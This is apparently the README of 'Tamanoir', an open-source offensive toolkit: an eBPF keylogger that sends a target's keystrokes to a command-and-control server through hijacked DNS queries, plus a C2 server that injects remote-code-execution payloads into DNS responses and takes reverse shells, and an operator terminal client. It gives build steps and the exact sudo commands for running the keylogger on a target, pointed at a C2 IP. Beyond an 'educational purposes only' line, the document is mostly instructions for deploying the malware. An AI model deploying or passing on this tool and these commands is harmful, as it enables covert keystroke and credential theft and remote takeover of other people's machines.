A large anteater of Central and South America, Myrmecophaga tridactyla
Tamanoir is structured around 3 components:
An eBPF program running on a target host, it will act as a keylogger and extract keystrokes via DNS queries.
In DNS response, attacker can choose to send chunks of RCE payload that will be executed on targeted host.
The Command & Control server. It acts as a DNS proxy and can inject rce payloads in DNS response.
It also can handle reverse shell connections.
The TUI client communicating with C2 server. Built on top of ratatui
Tui client demo
- what is eBPF
- C2: Command and Control
- RCE: Remote Code Execution
Jump to:
You need a Linux based OS.
To build from source, make sure you have:
- bpf-linker installed.
- Rust installed with
nightlytoolchain. - protobuf-compiler
cd tamanoir-ebpf && cargo build --release
cargo build -p tamanoir --release
cargo build -p tamanoir-c2 --release
cargo build -p tamanoir-tui --release
These commands will produce tamanoir, tamanoir-c2 and tamanoir-tui executables in target/release that you can add to your$PATH
You can download the pre-built binaries from the release page
🖥️ on target host:
RUST_LOG=info sudo -E tamanoir \
--proxy-ip <C2 server IP> \
--hijack-ip <locally configured DNS server IP> \
--iface <network interface name>
for example:
RUST_LOG=info sudo -E tamanoir \
--proxy-ip 192.168.1.15 \
--hijack-ip 8.8.8.8 \
--iface wlan0
🖥️ on your C2 server host:
sudo tamanoir-c2 start
Note
Make sure port 53 is available
🖥️ wherever you want to use the client:
tamanoir-tui -i <C2 server IP>
Note
Make sure C2 server is reachable on port 50051
Tamanoir is developed for educational purposes only
GPLv3